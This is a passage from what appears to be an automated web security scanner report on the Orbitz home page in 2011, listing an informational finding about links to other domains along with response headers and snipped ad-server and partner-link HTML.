<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&"></script>
...[SNIP]...
<li class="twitterLogo"><a href="http://www.twitter.com/orbitz" target="_blank" rel="nofollow">Follow us on Twitter</a>
...[SNIP]...
<li class="facebookLogo"><a href="http://www.facebook.com/orbitz" target="_blank" rel="nofollow">Become a fan on Facebook</a>
...[SNIP]...
<div class="corpHPModule homeMod">
        <a class="corpLogoLink" href="http://www.orbitzforbusiness.com/homepage_asset" rel="nofollow"><img src="/img/business/business_logo_109x30.gif" width="109" height="30"/>
...[SNIP]...
<span>Control costs without sacrificing service  |  <a href="http://www.orbitzforbusiness.com/homepage_asset" rel="nofollow">Learn more</a>
...[SNIP]...
</a> to make sure you get first crack at the best offers. You also can follow us on <a href="http://twitter.com/orbitz" rel="nofollow">Twitter</a> and <a href="http://facebook.com/orbitz" rel="nofollow">Facebook</a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li>Book flights and <a href="http://www.cheaptickets.com">cheap hotels</a>
...[SNIP]...
<li>Find <a href="http://www.hotelclub.com">Hotel Deals</a>
...[SNIP]...
<li><a href="http://www.ratestogo.com">Last Minute Hotel Deals</a>
...[SNIP]...
<li class="last">Compare <a href="http://www.trip.com">cheap trips</a>
...[SNIP]...
<li class="first">Read Away.com's <a href="http://www.away.com">travel guide</a>
...[SNIP]...
<li>Research <a href="http://www.gorp.com">national parks</a>
...[SNIP]...
<li>Get <a href="http://www.lodging.com">lodging</a>
...[SNIP]...
<li class="last">Find <a href="http://outsideonline.com">outdoor gear</a>
...[SNIP]...
<li class="first">Book <a href="http://www.ebookers.com">cheap hotels</a>
...[SNIP]...
<li class="last"><a href="http://www.orbitzforbusiness.com/homepage_footer">Corporate travel</a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...

17.341. http://www.orbitz.com/App/Home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/Home

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/Home?reset=true&z=2eb6&r=9

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://facebook.com/orbitz
http://outsideonline.com/
http://twitter.com/orbitz
http://www.away.com/
http://www.cheaptickets.com/
http://www.ebookers.com/
http://www.facebook.com/Orbitz
http://www.facebook.com/orbitz
http://www.google.com/jsapi
http://www.gorp.com/
http://www.hotelclub.com/
http://www.lodging.com/
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzforbusiness.com/homepage_asset
http://www.orbitzforbusiness.com/homepage_footer
http://www.orbitzgames.com/
http://www.ratestogo.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=225&rotator=true&width=519&adType=script&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=90&width=728&adType=noframe&
http://www.trip.com/
http://www.twitter.com/orbitz

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=C4FA721F0918D48EB0461750E018E375; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:22 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 175809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad468x60_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=60&width=468&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=60&width=468&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=60&width=468&adType=noframe&" height="60" width="468" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=225&rotator=true&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&"></script>
...[SNIP]...
<li class="twitterLogo"><a href="http://www.twitter.com/orbitz" target="_blank" rel="nofollow">Follow us on Twitter</a>
...[SNIP]...
<li class="facebookLogo"><a href="http://www.facebook.com/orbitz" target="_blank" rel="nofollow">Become a fan on Facebook</a>
...[SNIP]...
<div class="corpHPModule homeMod">
        <a class="corpLogoLink" href="http://www.orbitzforbusiness.com/homepage_asset" rel="nofollow"><img src="/img/business/business_logo_109x30.gif" width="109" height="30"/>
...[SNIP]...
<span>Control costs without sacrificing service  |  <a href="http://www.orbitzforbusiness.com/homepage_asset" rel="nofollow">Learn more</a>
...[SNIP]...
</a> to make sure you get first crack at the best offers. You also can follow us on <a href="http://twitter.com/orbitz" rel="nofollow">Twitter</a> and <a href="http://facebook.com/orbitz" rel="nofollow">Facebook</a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li>Book flights and <a href="http://www.cheaptickets.com">cheap hotels</a>
...[SNIP]...
<li>Find <a href="http://www.hotelclub.com">Hotel Deals</a>
...[SNIP]...
<li><a href="http://www.ratestogo.com">Last Minute Hotel Deals</a>
...[SNIP]...
<li class="last">Compare <a href="http://www.trip.com">cheap trips</a>
...[SNIP]...
<li class="first">Read Away.com's <a href="http://www.away.com">travel guide</a>
...[SNIP]...
<li>Research <a href="http://www.gorp.com">national parks</a>
...[SNIP]...
<li>Get <a href="http://www.lodging.com">lodging</a>
...[SNIP]...
<li class="last">Find <a href="http://outsideonline.com">outdoor gear</a>
...[SNIP]...
<li class="first">Book <a href="http://www.ebookers.com">cheap hotels</a>
...[SNIP]...
<li class="last"><a href="http://www.orbitzforbusiness.com/homepage_footer">Corporate travel</a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad4">
